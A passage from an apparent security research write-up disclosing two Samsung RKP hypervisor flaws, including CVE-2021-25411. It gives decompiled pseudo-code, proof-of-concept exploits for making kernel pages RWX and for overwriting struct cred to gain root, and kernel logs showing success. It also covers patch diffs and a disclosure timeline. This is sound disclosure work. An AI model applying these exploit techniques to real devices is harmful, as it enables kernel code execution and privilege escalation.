  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0x80, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 116, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0x80, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 124, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

dynamic_load_protection will make the code segment(s) R-X in the stage 2 by calling rkp_s2_range_change_permission. Only executables of type RKP_DYN_FIMC_COMBINED can have two code segments. To avoid dynamic_load_verify_signing, and to get directly to dynamic_load_rw, we can make the second call to rkp_s2_range_change_permission fail by giving it an address that is not page-aligned.

int64_t dynamic_load_rw(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 239, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 247, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

dynamic_load_rw will make the code segment(s) RWX in the stage 2 by also calling rkp_s2_range_change_permission. If we gave an address that is not page-aligned in dynamic_load_protection, the second call to rkp_s2_range_change_permission will also fail here, but that's not an issue.

For reference (and to complete the Samsung RKP Compendium), you can find below the pseudo-code of all the other functions.

int64_t dynamic_load_verify_signing(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (NO_FIMC_VERIFY) {
    uh_log('L', "rkp_dynamic.c", 135, "FIMC Signature verification Skip");
    return 0;
  }
  if (rkp_dyn->type != RKP_DYN_FIMC && rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (fmic_signature_verify(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('W', "rkp_dynamic.c", 143, "FIMC Signature verification failed %lx, %lx", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  uh_log('L', "rkp_dynamic.c", 146, "FIMC Signature verification Success %lx, %lx", rkp_dyn->binary_base,
         rkp_dyn->binary_size);
  return 0;
}
int64_t dynamic_load_make_rox(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}
int64_t dynamic_load_add_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = memlist_add(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += memlist_add(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2);
  }
  return res;
}
int64_t dynamic_load_add_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  dynlist_entry = static_heap_alloc(0x38, 0);
  memcpy(dynlist_entry, rkp_dyn, 0x38);
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  return memlist_add_extra(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, dynlist_entry);
}
int64_t dynamic_load_rm_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  res = memlist_remove_exact(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, &dynlist_entry);
  if (res) {
    return res;
  }
  if (!dynlist_entry) {
    uh_log('W', "rkp_dynamic.c", 205, "No dynamic descriptor");
    return -11;
  }
  res = 0;
  if (rkp_dyn->code_base1 != dynlist_entry->code_base1 || rkp_dyn->code_size1 != dynlist_entry->code_size1) {
    --res;
  }
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED &&
      (rkp_dyn->code_base2 != dynlist_entry->code_base2 || rkp_dyn->code_size2 != dynlist_entry->code_size2)) {
    --res;
  }
  static_heap_free(dynlist_entry);
  return res;
}
int64_t dynamic_load_rm_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = memlist_remove_exact(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1, 0);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += memlist_remove_exact(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2, 0);
  }
  return res;
}
int64_t dynamic_load_set_pxn(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  res = rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    res += rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}
int64_t dynamic_load_rm(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 338, "dynamic_load_rm_dynlist failed");
    res = 0xf13c0007;
  } else if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 345, "dynamic_load_rm_executable failed");
    res = 0xf13c0008;
  } else if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 352, "dynamic_load_set_pxn failed");
    res = 0xf13c0009;
  } else if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 359, "dynamic_load_rw failed");
    res = 0xf13c000a;
  } else {
    res = 0;
  }
  return res;
}

Exploitation

We have the ability to change memory that is R-X or RW- in the stage 2 to RWX. To be able to execute arbitrary code at EL1 using this vulnerability, the simplest way is to find a physical page that is already executable in the stage 1. Then we can use the virtual address of this page in the kernel's physmap (the Linux kernel physmap, not RKP's physmap) to create a second mapping that is writable. By writing our code to the second mapping, and executing it from the first, we can achieve our arbitrary code execution.

          stage 1   stage 2
 EXEC_VA ---------+--------> PAGE_PA
            R-X   |   R-X
                  |    ^---- will be changed to RWX
WRITE_VA ---------+
            RW-

By dumping the page tables of the stage 1, we easily found a double-mapped page.

...
ffffff80fa500000 - ffffff80fa700000 (PTE): R-X at 00000008f5520000 - 00000008f5720000
...
ffffffc800000000 - ffffffc880000000 (PMD): RW- at 0000000880000000 - 0000000900000000
...

For example, if we choose 0xffffff80fa500000 for the executable mapping, then the writable mapping will be at:

>>> EXEC_VA = 0xffffff80fa6ff000
>>> PAGE_PA = EXEC_VA - 0xffffff80fa500000 + 0x00000008f5520000
>>> PAGE_PA
0x8f571f000
>>> WRITE_VA = 0xffffffc800000000 + PAGE_PA - 0x0000000880000000
>>> WRITE_VA
0xffffffc87571f000

And by dumping the page tables of the stage 2, we can confirm that it is initially mapped as R-X.

...
0x8f571f000-0x8f5720000: S2AP=1, XN[1]=0
...

The last important things we need to take into account when writing our exploit are the data and instruction caches. To be safe, in our exploit we decided to prefix the code to execute with some "bootstrap" instructions that will clean the caches.

Proof of Concept

#define UH_APP_RKP            0xc300c002
#define RKP_DYNAMIC_LOAD      0x20
#define RKP_DYN_COMMAND_INS   0x01
#define RKP_DYN_FIMC_COMBINED 0x03

/* these 2 VAs point to the same PA */
#define EXEC_VA  0xffffff80fa6ff000UL
#define WRITE_VA 0xffffffc87571f000UL

/* bootstrap code to clean the caches */
#define DC_IVAC_IC_IVAU 0xd50b7520d5087620UL
#define DSB_ISH_ISB     0xd5033fdfd5033b9fUL

void exploit() {
    /* fill the structure given as argument */
    uint64_t rkp_dyn = kernel_alloc(0x38);
    kernel_write(rkp_dyn + 0x00, RKP_DYN_FIMC_COMBINED); // type
    kernel_write(rkp_dyn + 0x08, kernel_alloc(0x1000));  // binary_base
    kernel_write(rkp_dyn + 0x10, 0x1000);                // binary_size
    kernel_write(rkp_dyn + 0x18, EXEC_VA);               // code_base1
    kernel_write(rkp_dyn + 0x20, 0x1000);                // code_size1
    kernel_write(rkp_dyn + 0x28, EXEC_VA + 1);           // code_base2
    kernel_write(rkp_dyn + 0x30, 0x1000);                // code_size2

    /* call the hypervisor to make the page RWX */
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, rkp_dyn);

    /* copy the code using the writable mapping */
    uint32_t code[] = {
        0xdeadbeef,
        0,
    };
    kernel_write(WRITE_VA + 0x00, DC_IVAC_IC_IVAU);
    kernel_write(WRITE_VA + 0x08, DSB_ISH_ISB);
    for (int i = 0; i < sizeof(code) / sizeof(uint64_t); ++i)
        kernel_write(WRITE_VA + 0x10 + i * 8, code[i * 2]);

    /* and execute it using the executable mapping */
    kernel_exec(EXEC_VA, WRITE_VA);
}

As a result of running the proof of concept, we get an undefined instruction exception, that we can observe in the kernel log (note the (deadbeef) part):

<2>[  207.365236]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault = UNDF / 0xffffff80fa6ff018
<2>[  207.365310]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault: 0x1 / 0x726ff018
<0>[  207.365338]  [3:     rkp_exploit:15549] undefined instruction: pc=00000000dec42a2e, rkp_exploit[15549] (esr=0x2000000)
<6>[  207.365361]  [3:     rkp_exploit:15549] Code: d5087620 d50b7520 d5033b9f d5033fdf (deadbeef)
<0>[  207.365372]  [3:     rkp_exploit:15549] Internal error: undefined instruction: 2000000 [#1] PREEMPT SMP
<4>[  207.365386]  [3:     rkp_exploit:15549] Modules linked in:
<0>[  207.365401]  [3:     rkp_exploit:15549] Process rkp_exploit (pid: 15549, stack limit = 0x00000000b4f56d76)
<0>[  207.365418]  [3:     rkp_exploit:15549] debug-snapshot: core register saved(CPU:3)
<0>[  207.365430]  [3:     rkp_exploit:15549] L2ECTLR_EL1: 0000000000000007
<0>[  207.365438]  [3:     rkp_exploit:15549] L2ECTLR_EL1 valid_bit(30) is NOT set (0x0)
<0>[  207.365456]  [3:     rkp_exploit:15549] CPUMERRSR: 0000000000040001, L2MERRSR: 0000000013000000
<0>[  207.365468]  [3:     rkp_exploit:15549] CPUMERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365480]  [3:     rkp_exploit:15549] L2MERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365491]  [3:     rkp_exploit:15549] debug-snapshot: context saved(CPU:3)
<6>[  207.365541]  [3:     rkp_exploit:15549] debug-snapshot: item - log_kevents is disabled
<6>[  207.365574]  [3:     rkp_exploit:15549] TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 89
<4>[  207.365590]  [3:     rkp_exploit:15549] CPU: 3 PID: 15549 Comm: rkp_exploit Tainted: G        W       4.14.113 #14
<4>[  207.365602]  [3:     rkp_exploit:15549] Hardware name: Samsung A51 EUR OPEN REV01 based on Exynos9611 (DT)
<4>[  207.365617]  [3:     rkp_exploit:15549] task: 00000000dcac38cb task.stack: 00000000b4f56d76
<4>[  207.365632]  [3:     rkp_exploit:15549] PC is at 0xffffff80fa6ff018
<4>[  207.365644]  [3:     rkp_exploit:15549] LR is at 0xffffff80fa6ff004

The exploit was successfully tested on the most recent firmware available for our test device (at the time of the report): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of Exynos devices, including the S10/S10+/S20/S20+ flagship devices, but its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make an hypervisor call with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Implement thorough checking in the "dynamic executable" commands:
    - The code segment(s) should not overlap any read-only pages
    (maybe checking the ro_bitmap or calling is_phys_map_free is enough)
    - dynamic_load_rw should not make the code segment(s) executable on failure
    (to prevent abusing it to create executable kernel pages...)
    - Ensure signature checking is enabled (it was disabled on some devices)

To see how Samsung patched this vulnerability, we binary diffed the most recent firmware available for the Samsung Galaxy S10 (at the time of checking the first patch): G973FXXSBFUF3. We could not use the latest firmware for the Samsung Galaxy A51 as this device had not been updated to the June patch level yet.

There have been some changes to dynamic_load_check:

int64_t dynamic_load_check(rkp_dynamic_load_t *rkp_dyn) {
    // ...

    if (rkp_dyn->type == RKP_DYN_MODULE)
        return -1;
+    binary_base = rkp_dyn->binary_base;
+    binary_end = rkp_dyn->binary_size + binary_base;
+    code_base1 = rkp_dyn->code_base1;
+    code_end1 = rkp_dyn->code_size1 + code_base1;
+    if (code_base1 < binary_base || code_end1 > binary_end) {
+        uh_log('L', "rkp_dynamic.c", 71, "RKP_21f66fc1");
+        return -1;
+    }
+    if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
+        code_base2 = rkp_dyn->code_base2;
+        code_end2 = rkp_dyn->code_size2 + code_base2;
+        if (code_base2 < binary_base || code_end2 > binary_end) {
+            uh_log('L', "rkp_dynamic.c", 77, "RKP_915550ac");
+            return -1;
+        }
+        if ((code_base1 > code_base2 && code_base1 < code_end2)
+                || (code_base2 > code_base1 && code_base2 < code_end1)) {
+            uh_log('L', "rkp_dynamic.c", 83, "RKP_67b1bc82");
+            return -1;
+        }
+    }
    binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
    if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
        uh_log('L', "rkp_dynamic.c", 91, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,rkp_dyn->binary_size);
        return -1;
    }
    if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size))
        uh_log('D', "rkp_dynamic.c", 96, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
    return 0;
}

Some checks were added to ensure that both code segments are within the binary's address range. The new checks don't account for integer overflows on all the base + size additions, but we noticed that was fixed as well in the October security update.

Because the binary's address range is then checked against the ro_bitmap by the call to pgt_bitmap_overlaps_range, it should no longer be possible to change memory that is R-X into RWX in the stage 2. It is still possible to change memory that is RW- into RWX, but there are already RWX pages in the stage 2 and the hypervisor ensures that if such a page is mapped as executable in the stage 1, it will be changed to read-only in the stage 2.

Writing to read-only kernel memory

SVE-2021-20176 (CVE-2021-25411): Vulnerable api in RKP allows attackers to write read-only kernel memory

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory.
The patch adds a proper address validation check to prevent unprivileged write to kernel memory.

Vulnerability

The virt_to_phys_el1 function is used by RKP to convert a virtual address into a physical address.

uint64_t virt_to_phys_el1(uint64_t addr) {
  // ...

  if (!addr) {
    return 0;
  }
  cs_enter(s2_lock);
  ats12e1r(addr);
  isb();
  par_el1 = get_par_el1();
  if ((par_el1 & 1) != 0) {
    ats12e1w(addr);
    isb();
    par_el1 = get_par_el1();
  }
  cs_exit(s2_lock);
  if ((par_el1 & 1) != 0) {
    isb();
    if ((get_sctlr_el1() & 1) != 0) {
      uh_log('W', "vmm.c", 135, "%sRKP_b0a499dd %p", "virt_to_phys_el1", addr);
      if (!dword_87035098) {
        dword_87035098 = 1;
        print_stack_contents();
      }
      dword_87035098 = 0;
    }
    return 0;
  } else {
    return (par_el1 & 0xfffffffff000) | (addr & 0xfff);
  }
}

virt_to_phys_el1 uses the AT S12E1R (Address Translate Stages 1 and 2 EL1 Read) instruction. This instruction performs stage 1 and 2 address translation, with permissions as if reading from the given virtual address from EL1. It then checks the PAR_EL1 (Physical Address Register) register, that contains the output address from the address translation instruction if it executed successfully, or fault information if it did not.

If the address translation instruction failed, virt_to_phys_el1 then uses the AT S12E1W (Address Translate Stages 1 and 2 EL1 Write) instruction. This instruction performs stage 1 and 2 address translation, with permissions as if writing from the given virtual address from EL1. It then also checks the PAR_EL1 register.

If any of the two translation instructions succeeded, virt_to_phys_el1 returns the output address. Otherwise, if the MMU is enabled, it logs a message and print the kernel stack contents (but only once).

Some of RKP's command handlers will call virt_to_phys_el1 to convert a kernel virtual address, with the intent of writing to the corresponding physical address. Since virt_to_phys_el1 returns if the address is readable and/or writable from EL1, we can abuse this to write to memory that is read-only for the kernel.

Exploitation

Interesting targets includes anything that is set as read-only in the stage 2, e.g. the kernel page tables, struct cred, struct task_security_struct, etc.

We need to find the command handlers using virt_to_phys_el1 that can be called after the hypervisor is fully initialized. The relevant command handlers are:

  • rkp_cmd_rkp_robuffer_alloc, that will write the address of the newly allocated page;
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
    *virt_to_phys_el1(ret_va) = page;
  }
  regs->x0 = page;
  return 0;
}
int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  regs->x0 = res;
  return res;
}

In particular, when specifying an invalid subcommand to rkp_cmd_dynamic_load, the return code will be 0, which can be used to change a UID/GID to 0 (root).

Proof of Concept

#define UH_APP_RKP       0xc300c002
#define RKP_DYNAMIC_LOAD 0x20

void print_ids() {
    uid_t ruid, euid, suid;
    getresuid(&ruid, &eudi, &suid);
    printf("Uid: %d %d %d\n", ruid, euid, suid);

    gid_t rgid, egid, sgid;
    getresgid(&rgid, &egid, &sgid);
    printf("Gid: %d %d %d\n", rgid, egid, sgid);
}

void write_zero(uint64_t rkp_dyn_p, uint64_t ret_p) {
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, 42, rkp_dyn_p, ret_p);
}

void exploit() {
    /* print the old credentials */
    print_ids();

    /* get the struct cred of the current task */
    uint64_t current = kernel_get_current();
    uint64_t cred = kernel_read(current + 1968);

    /* allocate the argument structure */
    uint64_t rkp_dyn_p = kernel_alloc(0x38);
    /* zero the fields of the struct cred */
    for (int i = 4; i < 36; i += 4)
        write_zero(rkp_dyn_p, cred + i);

    /* print the new credentials */
    print_ids();
}
Uid: 2000 2000 2000
Gid: 2000 2000 2000
Uid: 0 0 0
Gid: 0 0 0

As a result of running the proof of concept, we can see that our credentials changed from shell to root.

The exploit was successfully tested on the most recent firmware available for our test device (at the time of the report): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of Exynos devices, including the S10/S10+/S20/S20+ flagship devices, but its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make an hypervisor call with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here is the immediate remediation step that we suggested to Samsung:

- Add a flag to virt_to_phys_el1 to specify if it should check if the memory
needs to be readable or writable from the kernel, or split this function in two

To see how Samsung patched this vulnerability, we binary diffed the most recent firmware available for the Samsung Galaxy S10 (at the time of checking the first patch): G973FXXSBFUF3. We could not use the latest firmware for the Samsung Galaxy A51 as this device had not been updated to the June patch level yet.

There have been some changes to rkp_cmd_rkp_robuffer_alloc and rkp_cmd_dynamic_load.

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t *regs) {
  // ...
  page = page_allocator_alloc_page();
  ret_va = regs->x2;
  // ...
  if (ret_va) {
    // ...
-    *virt_to_phys_el1(ret_va) = page;
+    ret_pa = virt_to_phys_el1(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    *ret_pa = page;
+    rkp_phys_map_unlock(ret_pa);
  }
  regs->x0 = page;
  return 0;
}
int64_t rkp_cmd_dynamic_load(saved_regs_t *regs) {
  // ...
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    // ...
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    // ...
  } else {
    res = 0;
  }
  ret_va = regs->x4;
-  if (ret_va)
-    *virt_to_phys_el1(ret_va) = res;
+  if (ret_va) {
+    ret_pa = rkp_get_pa(ret_va);
+    rkp_phys_map_lock(ret_pa);
+    if (!is_phys_map_free(ret_pa)) {
+      rkp_phys_map_unlock(ret_pa);
+      rkp_policy_violation("RKP_07fb818a");
+    }
+    rkp_phys_map_unlock(ret_pa);
+    *ret_pa = res;
+  }
  regs->x0 = res;
  return res;
}

The two command handlers that we said could be used to exploit this vulnerability were modified. Specifically, they are now checking that the kernel-provided address is marked as FREE in the physmap, and triggering a policy violation if it isn't.

While the patch works, because there are no other command handlers accessible after initialization that is using virt_to_phys_el1, we think it is suboptimal:

  • it is possible that someone at Samsung might forget to implement the new check if a new command handler is being added, which would not have happened if they had added a flag denoting read or write access to virt_to_phys_el1 like we suggested.
  • it also assumes that anything that is not writable from the kernel will not be marked as FREE, but if they ever forget to do that, it will re-introduce this vulnerability.

Conclusion

In this conclusion, we would like to give you our honest thoughts about Samsung RKP and its implementation (as of early 2021).

Talking strictly about the implementation itself, we think that because the codebase has been around for a few years already, it has increased a lot in complexity. This might explain why vulnerabilities like the ones we have seen today and configuration mistakes can happen. We are confident that are other bugs lurking in the code that we have glossed over. In particular, the choice of duplicating information that is already in the stage 2 page tables (for example the S2AP bit and the ro_bitmap) is very error-prone. In the future, we will be blogging about another security hypervisor implementation that is doing things differently, and comparing it to Samsung's implementation.

Talking about the impact of Samsung RKP on the overall device security, we believe that it is contributing to making the device more secure, despite the flaws of the implementation. As a defense-in-depth measure, it is making it harder for an attacker to compromise the device. When writing an Android kernel exploit, an attacker will need to find an RKP bypass if they intend to get code execution on a Samsung device. Unfortunately, there are known bypasses that need to be addressed by Samsung.

Timeline

SVE-2021-20178

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 08, 2021 - Notification that the update patching the vulnerability has been released.
  • Jul. 20, 2021 - We reopen the issue after binary diffing the fix.
  • Jul. 30, 2021 - The issue will be patched in the October security update.
  • Oct. 05, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20179

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20176

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 29, 2021 - No updates at the moment.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - Vulnerability is confirmed.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - We ask for updates.
  • Jun. 23, 2021 - Notification that the update patching the vulnerability has been released.